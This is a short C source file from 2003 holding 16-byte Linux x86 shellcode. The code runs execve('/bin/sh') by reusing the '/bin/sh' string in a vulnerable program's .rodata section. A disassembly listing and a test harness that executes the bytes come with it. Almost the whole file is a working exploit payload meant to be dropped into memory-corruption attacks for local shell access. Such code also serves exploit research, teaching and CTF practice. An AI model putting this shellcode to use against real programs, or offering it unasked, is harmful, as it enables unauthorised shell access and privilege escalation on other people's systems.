reusage-linux.c

/*
 * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $
 *
 * reusage-linux.c - re-use of "/bin/sh" string in .rodata
 * Copyright (c) 2003 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh"
 * string stored in the .rodata section of the vulnerable program. Change
 * the string address as needed (based on zillion's original idea).
 */

/*
 * execve("/bin/sh", ["/bin/sh"], NULL)
 *
 * 8049368:       31 c0                   xor    %eax,%eax
 * 804936a:       bb 08 84 04 08          mov    $0x8048408,%ebx # change it
 * 804936f:       53                      push   %ebx
 * 8049370:       89 e1                   mov    %esp,%ecx
 * 8049372:       31 d2                   xor    %edx,%edx
 * 8049374:       b0 0b                   mov    $0xb,%al
 * 8049376:       cd 80                   int    $0x80
 * 8049378:       00 00                   add    %al,(%eax)
 */

char sc[] = /* 16 bytes */
"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

main()
{
	int (*f)() = (int (*)())sc; f();
}